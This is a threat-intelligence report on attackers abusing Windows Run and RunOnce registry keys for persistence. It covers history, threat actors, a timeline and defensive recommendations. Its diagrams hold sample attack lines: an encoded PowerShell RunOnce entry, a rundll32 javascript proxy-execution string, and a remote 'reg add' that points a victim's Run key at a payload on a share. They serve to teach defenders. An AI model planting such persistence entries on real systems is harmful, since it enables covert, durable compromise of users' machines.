Adversaries frequently abuse the Windows Run and RunOnce registry keys to establish persistence, ensuring payload execution at logon or startup while blending in with legitimate autostart behavior. This technique, long used by both commodity malware and APTs, offers stealth, durability, and low privilege requirements, making detection difficult without strong baselining and continuous monitoring.

CYBER INSIGHTS CYBER INSIGHTS SEPT 10, 2025 SEPT 10, 2025

Overview

Persistence via Windows Run and RunOnce registry keys is a low-friction, high-reliability method for adversaries to ensure code executes automatically during logon and, in some variants, early in the startup process. By dropping values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run and …\RunOnce (including Wow6432Node mirrors), attackers can launch executables, script hosts, or loaders without deploying services or scheduled tasks, blending into the normal startup noise users expect on Windows endpoints. Run guarantees repeat execution on every logon, delivering durable persistence across reboots, while RunOnce provides single-shot execution that self-removes after use, ideal for staging a second-stage payload, repairing a foothold, or re-arming other persistence. These keys are attractive because they require minimal privileges in the user hive, survive many remediation attempts, and commonly point to payloads in user-writable paths that evade basic allow-listing. They also inherit the caller’s context (user vs. system), enabling lateral privilege use when entries are created under machine-wide hives. For defenders, the risk is twofold: the technique is easy to deploy at scale with native tools and hard to distinguish from legitimate autostarts without strong baselines, turning everyday startup behavior into a reliable vehicle for long-term control.

Key Findings:

  • Run and RunOnce registry keys remain one of the most abused persistence mechanisms in Windows environments, offering adversaries guaranteed execution at startup or logon without requiring complex tooling or elevated privileges.
  • Adversaries disguise persistence by mimicking legitimate software entries, often pointing values to payloads in %APPDATA%, %TEMP%, or network shares, making detection difficult without strong baselining.
  • RunOnce keys provide stealth staging for secondary persistence and payloads, enabling attackers to execute one-time loaders, establish hidden services, or deploy registry-free persistence while erasing evidence of initial execution.
  • Immediate Actions: Establish an enterprise-wide baseline of legitimate Run and RunOnce registry entries and enforce continuous monitoring. Immediately investigate new or modified values that point to unsigned binaries, scripting engines, or non-standard file paths.

1.0 Threat Overview

1.1 Historical Context

The use of Run and RunOnce registry keys for persistence has been a fixture of Windows-based malware since the 1990s, first appearing in early worms and trojans and later becoming standard practice for large crimeware families such as banking trojans and botnets. Over time, adversaries recognized the appeal of these keys: Run ensures continuous execution at every logon, while RunOnce provides a stealthier, single-use mechanism ideal for launching loaders, secondary implants, or establishing alternate persistence. Both commodity malware and advanced persistent threats have operationalized the technique, leveraging its universality across all Windows systems and its ability to blend seamlessly with legitimate software entries. Because disabling these keys outright would disrupt normal operations, their abuse has persisted across decades of intrusions, making them one of the most enduring and reliable persistence mechanisms available to threat actors.

1.2 Technique Breakdown

Adversaries exploit the Run and RunOnce registry keys because they provide built-in, automatic execution of programs at logon or startup without requiring external tools. These entries are trusted by the operating system and widely used by legitimate software for update agents, drivers, and utilities — giving attackers both reliability and stealth. By inserting or modifying values in these keys, threat actors ensure malicious payloads are executed in predictable contexts, often with elevated privileges.

Registry Persistence: Key Techniques & Abuse Methods HKEY_CURRENT_USER (HKCU) / HKEY_LOCAL_MACHINE (HKLM) \Software\Microsoft\Windows\CurrentVersion\ Run RunOnce RunOnceEx Run Key Abuse Persistence: Every logon/boot Guarantees re-execution after reboots Commonly abused by commodity malware Example: HKCU\...\Run\Update = C:\Users\%USER%\update.exe RunOnce Key Abuse Execution: One-time only Auto-deletes entry after execution Used for staging/second-stage loaders Example: HKLM\...\RunOnce\Setup = powershell.exe -enc [b64] RunOnceEx Variants Extended: Multiple commands Allows command chaining Staged payload execution Example: HKLM\...\RunOnceEx\0001\{GUID} = cmd1|cmd2 HKLM vs HKCU Context Differences HKLM (Local Machine) • Affects all users system-wide • Requires admin/SYSTEM privileges HKCU (Current User) • User-specific persistence • No elevation required Masquerading & Blending Techniques Common disguise names: OneDriveUpdate Windows Defender Health ChromeUpdate AdobeFlashUtil • Payloads placed in trusted paths (System32, Program Files) Fileless Payloads & Living Off The Land Binaries (LOLBAS) powershell.exe • Encoded commands • Download & execute • In-memory execution rundll32.exe • JavaScript execution • DLL loading • Proxy execution regsvr32.exe • COM scriptlets • Remote payloads • Bypass controls wscript.exe • VBS/JS execution • File operations • Network downloads mshta.exe • HTA applications • Remote URLs • Inline scripts cmd.exe • Batch scripts • Chained cmds • Obfuscation Operational Roles in Attack Chains Long-term Persistence Run keys for continuous access Stealthy Single-Use RunOnce for staging/setup Chained Execution Combined with other techniques Obfuscation Layer Hide true payload intent ! Detection Focus • Monitor registry modifications (Sysmon Event ID 13) • Alert on suspicious LOLBAS usage from Run keys • Track unusual process spawning patterns • Baseline legitimate Run entries Registry persistence remains one of the most common techniques across all threat actor sophistication levels

2.0 Preconditions for Exploitation

For adversaries to successfully persist via Run and RunOnce keys, several environmental and operational conditions must align. These preconditions highlight where defensive gaps create opportunity for attackers:

Prerequisites & Enablers for Registry Persistence Attacks Key conditions that enable successful Run/RunOnce key exploitation 1 Registry Write Permissions User-Level Access HKCU\...\Run HKCU\...\RunOnce LOW System-Wide Access HKLM\...\Run (requires admin) Via UAC bypass, cred theft, privesc HIGH Attack Flow: Initial compromise → Write HKCU entries → Escalate privileges → Write HKLM entries Most attacks start with user-level persistence, then escalate for system-wide impact 2 Payload Placement in Accessible Paths Common Writable Directories: %APPDATA% %TEMP% %PROGRAMDATA% C:\Users\<User>\* C:\ProgramData\* Without AppLocker/WDAC: Execution from non-standard locations succeeds 3 Monitoring Gaps in Registry & Autorun Locations No registry auditing (Event ID 4657/13) No central collection of autorun changes Absence of baseline for legitimate entries Result: Attackers modify keys without detection Malicious entries blend with legitimate software updates, vendor agents, or system utilities 4 Process Execution Flexibility Unrestricted Trusted Interpreters: powershell.exe wscript.exe cmd.exe rundll32.exe regsvr32.exe Without restrictions: • No AppLocker rules • No Constrained Language Mode • Encoded/obfuscated commands work 5 Privilege & Policy Mismanagement Local Admin Rights Non-admin users with local admin Weak Group Policy GPO not enforced/overrideable Escalate HKCU → HKLM persistence Repeatedly set autoruns despite cleanup 6 System Reboot/Logon Events Normal Reboots User Logons Payload Executes Persistence relies on predictable reboot cycles Ineffective only in: extreme uptime systems, kiosk lockdowns, or no-reboot environments Attack Success Formula Registry Write Permission + Writable Path for Payload + No Registry Monitoring + Unrestricted Execution + Weak Policies + System Reboots = SUCCESSFUL PERSISTENCE ! Defense Priority: Break any link in this chain to prevent attacks Enable registry auditing • Implement AppLocker • Monitor autorun locations • Enforce least privilege • Baseline legitimate entries

2.1 Execution Flow in Intrusions

Run and RunOnce registry keys provide adversaries with a simple but powerful chain of persistence across the intrusion lifecycle. The following illustrates common patterns:

Abuse of Run/RunOnce Registry Keys Attack Phases and Tradecraft 1. Initial Access Malware installers add entries to guarantee execution Example: HKCU\...\Run\Updater → %APPDATA%\updater.exe 2. Post-Exploitation / Staging RunOnce for one-time payloads and staging Example: HKCU\...\RunOnce\Stage → PowerShell C2 beacon 3. Persistence Maintenance HKLM entries for system-wide persistence (requires admin) Example: HKLM\...\Run\SystemHealth → C:\ProgramData\winhealthsvc.exe 4. Defense Evasion Obfuscation with LOLBAS and misleading names Example: WindowsUpdate = rundll32.exe javascript:"\..\mshtml, RunHTMLApplication" 5. Privilege Escalation User-level keys bootstrap elevation to SYSTEM Example: Malware → PowerShell → stolen creds → HKLM write 6. Lateral Movement Support Remote registry modification and shared payloads Example: reg add \\victim\HKLM\...\Run /v SvcUpdate /d \\10.0.0.5\share\payload.exe 7. Operational Support / Impact Cleanup tasks, log-wipers, and auxiliary tools Example: RunOnce → cleanup binary → clear shadow copies Detection Focus Areas • Monitor registry changes under Run/RunOnce keys (Sysmon Event ID 13) • Alert on suspicious process creation from rundll32, mshta, regsvr32 • Track remote registry modifications and unusual HKLM writes Key Indicators Initial Compromise Persistence Evasion Movement Impact HKCU = HKEY_CURRENT_USER HKLM = HKEY_LOCAL_MACHINE

3.0 Threat Actor Utilization

Run and RunOnce registry persistence is leveraged across both financially motivated groups and state-sponsored APTs because it offers simplicity, stealth, and guaranteed execution after reboot or logon. While commodity malware families frequently rely on Run keys for resilience, advanced actors combine these keys with loaders, privilege escalation chains, or secondary persistence mechanisms. Below are notable cases where threat actors operationalized Run/RunOnce in meaningful ways.

Threat Actors Leveraging Run/RunOnce Registry Persistence Threat Actor Technique Applied Objective APT29 (Cozy Bear) Nation-State Deployed Run key entries referencing: • PowerShell stagers • DLL side-loaders Used in early stages of government intrusions Long-term persistence for espionage while blending into normal user logons FIN7 / FIN8 (Cobalt Group) Financial Crime Installed Run key persistence pointing to: %APPDATA%\*.exe Under benign names like "OneDriveUpdate" Ensure card-data theft tools, RATs, and RDP backdoors relaunch after reboot TA505 (Clop / Dridex) Ransomware Used Run and RunOnce keys to auto-start: • SDBbot loaders • FlawedAmmyy RAT Often masquerading as software updaters Reliable persistence in large-scale financial and ransomware operations APT41 (Double Dragon) Dual-Purpose Modified both HKCU and HKLM Run keys for: • Dual-layer persistence • Combined with signed binaries Enhanced stealth techniques Blend espionage and financial operations by ensuring cross-user execution Lazarus Group (Hidden Cobra) Nation-State Leveraged RunOnce for: • Single-use droppers • Stage secondary persistence Advanced persistence chaining One-time payload execution that sets up kernel-level or service-based persistence RedLine Stealer (Info-stealer families) Commodity Malware Widely observed writing to Run keys: %TEMP%\update.exe Guarantee data exfiltration tools survive reboots Commodity persistence ensuring widespread infection durability Registry Keys Used: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\Run ...\RunOnce

4.0 Historical Exploit Timeline

The abuse of Run and RunOnce registry keys dates back to the early 2000s, when crimeware families relied on these autostart locations to ensure malware survived across reboots. Over time, both cybercriminal groups and APTs operationalized the technique, layering it with obfuscation, encryption, and masquerading to bypass detection. Run keys provided reliability for long-term operations, while RunOnce keys offered stealthier, one-time execution to stage additional persistence or payloads. The timeline below highlights major points in the evolution of this persistence vector.

Evolution of Run/RunOnce Registry Key Abuse A Timeline of Malware Persistence Techniques Early 2000s Zeus, SpyEye, Conficker Technique: Malware wrote payload paths into HKCU\Software\Microsoft\Windows\CurrentVersion\Run Outcome: Established commodity persistence across millions of infections 2013-2014 DarkComet RAT / PlugX variants Technique: RunOnce keys deployed for staging secondary droppers post-initial compromise Outcome: One-time execution enabled stealth deployment of rootkits and RATs 2016-2017 FIN7 campaigns Technique: Run keys created under system-like names (e.g., "AdobeUpdate") pointing to %APPDATA%\*.exe Outcome: Maintained persistence for POS malware and lateral movement tools 2018-2019 APT29 intrusions Technique: PowerShell loaders and DLLs in Run keys; often under HKLM for system-wide persistence Outcome: Enabled espionage operations with consistent re-entry after reboots 2020 TA505 / Clop ransomware operators Technique: Run key entries used to restart SDBbot backdoor and FlawedAmmyy RAT Outcome: Supported financial theft and ransomware staging across enterprise victims 2022 APT41 espionage activity Technique: Dual persistence using HKCU and HKLM Run keys; entries disguised as legitimate vendor software Outcome: Ensured persistence across users, blending into enterprise environments 2024 RedLine Stealer / commodity info-stealers Technique: Widespread use of Run key persistence for mass-market infostealer campaigns Outcome: Guaranteed durability of lightweight stealers in consumer and corporate endpoints 2025 Lazarus operations Technique: RunOnce used for one-time execution of droppers that established deeper persistence Outcome: Leveraged transient execution to evade detection while ensuring long-term footholds Increasing Sophistication Key Evolution: From simple commodity malware → Nation-state operations → Advanced evasion techniques Registry paths: HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run | RunOnce for transient execution

5.0 Risk and Impact

Abuse of the Run and RunOnce registry keys (including their Wow6432Node variants) offers attackers a reliable and covert method to maintain persistence on Windows systems. These keys enable malicious code—whether executables, script hosts, or loaders—to automatically run at user logon or system startup, with minimal friction and without needing additional software. Threat actors commonly mimic legitimate startup entries or point their payloads to writable but overlooked directories like %APPDATA% or %TEMP%, making detection extremely challenging for defenders. As a result, malware can evade remediation, reinfect systems after reboot, and operate stealthily under the guise of normal behavior. This registry-based persistence technique supports both short-term and long-term control over compromised endpoints. Run keys ensure malware relaunches at every user login, while RunOnce keys allow stealthy, one-time execution—ideal for inserting second-stage payloads or later disabling security tools. These registry entries persist through reboots, survive many cleanup attempts, and can operate under both user and elevated contexts, making them viable tools even for advanced persistent threats. Historical tracking shows widespread abuse by malware families and APT groups (e.g., FIN7, APT29, Lazarus), confirming that Run key manipulation remains a cornerstone of post-intrusion operations.

6.0 Recommendations

6.1 Harden Registry Modification Paths

  • Enforce granular permissions on HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and RunOnce to allow only trusted installers (via GPO or Intune). Audit changes made by reg.exe, powershell.exe, and scripting hosts.
  • Block unprivileged processes from writing to Run keys using WDAC/AppLocker rules targeting reg add HKLM\...\Run* and HKCU\...\Run*.
  • Create fake Run/RunOnce keys in honeypot user hives (decoy accounts or unused test machines).
  • Automate daily diffing of HKCU vs. HKLM Run keys across the environment.

6.2 Baseline and Monitor Autostart Entries

  • Build a golden baseline of Run/RunOnce keys per system role, then perform regular diffs. Flag new entries with:
    • File paths in %APPDATA%, %TEMP%, %PROGRAMDATA%, or user profile subfolders.
    • References to unsigned binaries, script files (.js, .vbs, .bat), or renamed LOLBAS utilities (e.g., rundll32.exe, mshta.exe).
    • Place a benign, digitally signed “canary binary” in common writable directories (e.g., %APPDATA%\Updater.exe).
  • Implement detection logic for double-persistence chains (same payload referenced in both HKCU and HKLM keys).

6.3 Defensive Telemetry Enhancements

  • Enable and forward Sysmon Event ID 13 (registry value set) and correlate with Event ID 4657 (registry changes) to detect new Run/RunOnce entries.
  • Add enrichment to logs by resolving binary hash, signer info, and parent process responsible for the modification. This distinguishes malicious registry writes from legitimate software installations.
  • Detect suspicious parent-child chains (e.g., Outlook → cmd.exe → reg.exe writing into Run).

6.4 Tamper and Evasion Detection

  • Hunt for RunOnce keys that reappear after execution, which indicates adversaries are programmatically re-adding entries.
  • Detect mismatched timestamps where registry entries are created/modified at off-hours or in clusters across multiple hosts.
  • Monitor for registry keys created with random or GUID-like names ({A1B2C3D4}), which often mask loader persistence.

6.5 Containment and Response

  • Develop playbooks to enumerate Run/RunOnce entries at scale via PowerShell (Get-ItemProperty HKCU:\...\Run*) or osquery (SELECT key, path, data FROM registry WHERE key LIKE 'HKLM\\...\\Run%';).
  • For confirmed malicious entries:
    • Suspend associated processes, capture volatile memory, and export registry hives for forensic triage.
    • Delete persistence keys only after confirming binaries are quarantined, otherwise they may be re-registered.
  • Monitor across the enterprise for the same entry/value name spreading (e.g., “OneDriveUpdate” in HKCU Run on multiple endpoints).

7.0 Hunter Insights

Looking ahead, threat actors are likely to expand their abuse of Run and RunOnce registry keys by pairing them with more advanced living-off-the-land binaries and fileless payloads to evade detection, while also leveraging automation to deploy registry persistence at scale across enterprise environments. We can expect the technique to evolve toward multi-layered persistence chains, where RunOnce triggers stealth loaders that establish deeper footholds via services, kernel drivers, or cloud sync abuse, further complicating remediation. As defenders adopt stronger baselines and registry monitoring, adversaries may increasingly disguise entries with signed binaries, blend into vendor update mechanisms, or shift to ephemeral, self-healing persistence that re-adds itself after deletion. In the near future, registry key abuse is likely to converge with AI-assisted malware deployment, enabling attackers to dynamically generate plausible process names and executable paths that mimic enterprise software, making differentiation between benign and malicious autostarts even more challenging.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.